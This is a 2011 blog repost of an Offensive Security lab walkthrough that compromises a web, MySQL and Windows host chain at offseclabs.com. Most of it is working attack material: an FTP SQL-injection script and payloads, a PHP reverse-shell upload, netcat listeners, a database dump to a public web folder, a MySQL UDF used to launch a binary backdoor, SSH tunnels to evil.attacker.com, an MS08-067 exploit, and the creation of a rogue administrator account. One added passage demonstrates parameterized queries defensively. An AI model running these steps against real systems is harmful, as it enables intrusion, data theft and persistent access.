Monday, September 12, 2011

HOWTO: Penetration Testing in the Real World

*** Do NOT attack any computer or network without authorization, or you may be put in jail. ***

Credit to: muts (of Offensive Security)

This is muts's work, not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Penetration Testing in the Real World from Offensive Security on Vimeo.


ftp-brute.py

#!/usr/bin/python
# Walks the ftpuser table one row at a time by injecting a UNION with
# LIMIT i,1 into the FTP username; the same payload is typed by hand below.
from ftplib import FTP
print("Attempting user directory discovery via FTP")
for i in range(0,6):
    # i is the row offset; the injected row's passwd column is 1, so the password is "1"
    username="%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT "+str(i)+",1; --  "
    password="1"
    ftp=FTP('www.offseclabs.com')
    ftp.login(username,password)
    print("Logged in as user "+str(i)+",1")
    ftp.retrlines('LIST')   # list that row's home directory
    ftp.close()


Commands


Open Terminal A :

nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(to enumerate the web server)
clear

ftp www.offseclabs.com
username - bob
password - bob
(to enumerate the FTP server)

ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --  
password - 1

(logged in to the FTP server)
pwd
ls
bye

clear

cd core
clear
nano brute.py --> (see ftp-brute.py above)
./brute.py
(this finds the fifth user, whose home directory is mapped to the web server's document root)
clear

ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --  
password - 1

(logged in as the fifth user)
ls
put rs.php --> (a PHP reverse shell)
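The FTP logins above succeed only because the server pastes the username straight into its SQL lookup. What follows is an added example, not code from the video or from Offensive Security: it models that lookup against an in-memory SQLite copy of an ftpuser table with constructed rows, runs the page's own username payload through both a string-built query and a parameterized one, and shows that binding the parameter is what stops it. The query shape and the table contents are assumptions.

```python
import sqlite3
# Constructed rows standing in for the ftpuser table the payload reads;
# the row at offset 5 is the account whose home is the web document root.
SAMPLE_USERS = [
    ("bob",   "bob",    1001, 1001, "/home/bob",   "/bin/sh"),
    ("alice", "s3cret", 1002, 1002, "/home/alice", "/bin/sh"),
    ("carol", "carol",  1003, 1003, "/home/carol", "/bin/sh"),
    ("dave",  "dave",   1004, 1004, "/home/dave",  "/bin/sh"),
    ("erin",  "erin",   1005, 1005, "/home/erin",  "/bin/sh"),
    ("www",   "w3b!",   1006, 1006, "/var/www",    "/bin/false"),
]
# The username typed at the manual ftp login above, verbatim.
PAYLOAD = "%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --  "
COLUMNS = "userid, passwd, uid, gid, homedir, shell"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ftpuser (userid TEXT, passwd TEXT, uid INT, gid INT, homedir TEXT, shell TEXT)")
    conn.executemany("INSERT INTO ftpuser VALUES (?,?,?,?,?,?)", SAMPLE_USERS)
    return conn

def lookup_vulnerable(conn, username):
    # Assumed query shape: the username is pasted into the SQL text, so the
    # closing quote and parenthesis in the payload let a UNION be appended.
    sql = "SELECT %s FROM ftpuser WHERE (userid='%s')" % (COLUMNS, username)
    return conn.execute(sql).fetchone()

def lookup_safe(conn, username):
    # Same lookup with a bound parameter: the payload is only a string that
    # matches no userid, so no row comes back and the login fails.
    sql = "SELECT %s FROM ftpuser WHERE (userid=?)" % COLUMNS
    return conn.execute(sql, (username,)).fetchone()

def authenticate(lookup, conn, username, password):
    """Return the matched account's home directory, or None on failure."""
    row = lookup(conn, username)
    if row is None:
        return None
    # str() because the UNION supplies the integer 1 as the passwd column
    return row[4] if str(row[1]) == password else None

def demo():
    conn = make_db()
    return {
        "bob_vulnerable": authenticate(lookup_vulnerable, conn, "bob", "bob"),
        "bob_safe": authenticate(lookup_safe, conn, "bob", "bob"),
        "payload_vulnerable": authenticate(lookup_vulnerable, conn, PAYLOAD, "1"),
        "payload_safe": authenticate(lookup_safe, conn, PAYLOAD, "1"),
    }
```

Run demo(): the string-built lookup hands the payload the sixth account's home directory without knowing any password, while the parameterized lookup rejects it and still accepts the real bob/bob login.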

-----------------------
Open Terminal B :

nc -lvp 80

-----------------------
Open Terminal C :

wget www.offseclabs.com/rs.php

(Terminal B now receives a reverse shell)

-----------------------
Go back to Terminal B :
(inside the reverse shell)

/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(this gives the MySQL username and password, as well as the MySQL server address and database name)

mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt

------------------------
Open a Firefox :

www.offseclabs.com/images/ccdump.txt
(this shows the database dump)

-------------------------
Go back to Terminal A :

(inside the FTP server)
put up.html --> (file upload HTML page)
put up.php --> (file upload PHP handler)

-------------------------
Open Firefox :

www.offseclabs.com/up.html

(upload lib_mysqludf_sys.so and mark it as 1)
(upload rs, a binary reverse shell, and mark it as 2)

** Details of lib_mysqludf_sys.so

---------------------------
Go back to Terminal A :

(quit the FTP server)
bye
clear
exit
(quit Terminal A)

----------------------------
Go back to Terminal B :

mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(log in to the MySQL server)
use pwn;
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/bd';

CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';

SELECT sys_eval('chmod 755 /tmp/bd');
SELECT sys_eval('/tmp/bd &');
(do not press Enter yet)

---------------------------
Open Terminal D :

nc -lvp 80

(go back to Terminal B and press Enter; a reverse shell arrives at Terminal D)

----------------------------
Open Terminal E :

nc -lvp 80

----------------------------
Go back to Terminal B :

(inside the MySQL session)
SELECT sys_eval('/tmp/bd &');

(press Enter and another reverse shell arrives at Terminal E)

---------------------------
Go back to Terminal E :

(inside the reverse shell)
ping -c 1 10.150.0.20
clear

ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel on port 445)

-----------------------------
Open Terminal F :

netstat -antp
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse

-----------------------------
Go back to Terminal D :

ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel on port 4444)

clear

------------------------------
Go back to Terminal F :

cd core
nano nx.py --> (an MS08-067 Python exploit for Windows 2003 SP2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444

(this gives a remote shell on 10.150.0.20)
ipconfig
net user hacker hacker /add
net localgroup administrators hacker /add

---------------------------------
Go back to Terminal D :

(quit the tunnel)
exit
clear

ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel, on port 3389)
clear

-----------------------------------
Open Terminal G :

netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1

(log in to 10.150.0.20 with username hacker and password hacker)


That's all! See you.